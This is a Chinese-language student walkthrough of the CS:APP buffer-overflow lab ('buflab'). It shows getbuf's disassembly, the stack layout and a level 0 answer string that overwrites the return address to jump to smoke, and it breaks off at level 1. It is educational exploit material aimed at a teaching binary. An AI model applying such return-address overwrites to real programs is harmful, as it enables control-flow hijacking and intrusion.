lab3 buflab。一个训练你利用buffer漏洞干一些非法的事情(狐狸脸ing)的lab。。
总体难度比上一个lab 即bomb lab简单一些,只要弄清楚buffer的原理还是比较容易做的。
*************************************************************************************************************************************************************************************
首先看看level0-3所用的getbuf函数,程序利用这个函数来建立buffer
08048ca4 <getbuf>:
8048ca4: 55 push %ebp
8048ca5: 89 e5 mov %esp,%ebp
8048ca7: 83 ec 38 sub $0x38,%esp
8048caa: 8d 45 d8 lea -0x28(%ebp),%eax<-buffer共0x28byte
8048cad: 89 04 24 mov %eax,(%esp)
8048cb0: e8 3c ff ff ff call 8048bf1 <Gets>
8048cb5: b8 01 00 00 00 mov $0x1,%eax
8048cba: c9 leave
8048cbb: c3 ret
0x28+0x4(<main>retaddr)+0x4(saved %esp)构成了getbuf的栈结构,具体结构图如下:
整个buffer共有48byte
*************************************************************************************************************************************************************************
level 0:
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement,rather than returning to test
查找到<smoke>函数的位置,
08049174 <smoke>:
8049174: 55 push %ebp
8049175: 89 e5 mov %esp,%ebp
那么把retaddr替换成08 04 91 74(注意little endian)即可
answer:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
74 91 04 08
前面的44个byte是任意填充的。
*************************************************************************************************************************************************************************
level 1:
your task is to get BUFBOMB to execute the code for fi